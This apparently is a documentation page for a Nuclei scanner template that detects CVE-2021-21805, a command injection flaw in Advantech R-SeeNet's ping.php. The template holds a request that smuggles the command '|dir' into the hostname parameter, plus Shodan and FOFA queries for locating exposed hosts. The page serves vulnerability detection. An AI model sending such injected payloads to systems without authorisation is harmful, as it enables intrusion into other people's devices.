Advantech R-SeeNet 2.4.12 - OS Command Injection
ID: CVE-2021-21805
Severity: critical
Author: arafatansari
Tags: cve2021,cve,rce,r-seenet,advantech
Description
Section titled “Description”Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
YAML Source
Section titled “YAML Source”id: CVE-2021-21805
info: name: Advantech R-SeeNet 2.4.12 - OS Command Injection author: arafatansari severity: critical description: | Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. reference: - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805 - https://nvd.nist.gov/vuln/detail/CVE-2021-21805 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21805 cwe-id: CWE-78 epss-score: 0.97374 epss-percentile: 0.99895 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: advantech product: r-seenet shodan-query: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" tags: cve2021,cve,rce,r-seenet,advantech
http: - method: GET path: - "{{BaseURL}}/php/ping.php?hostname=|dir"
matchers-condition: and matchers: - type: word part: body words: - "<title>Ping |dir</title>" - "bottom.php" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a004630440220579d2b94269c96215ca75fd23c4b28573a68170d46f6a0c48c82b706ba6a8fd50220048b4b9e3fbaa1e65d1b6cda12d6c714304b252558a1132ff201857dfb8e6512:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21805.yaml"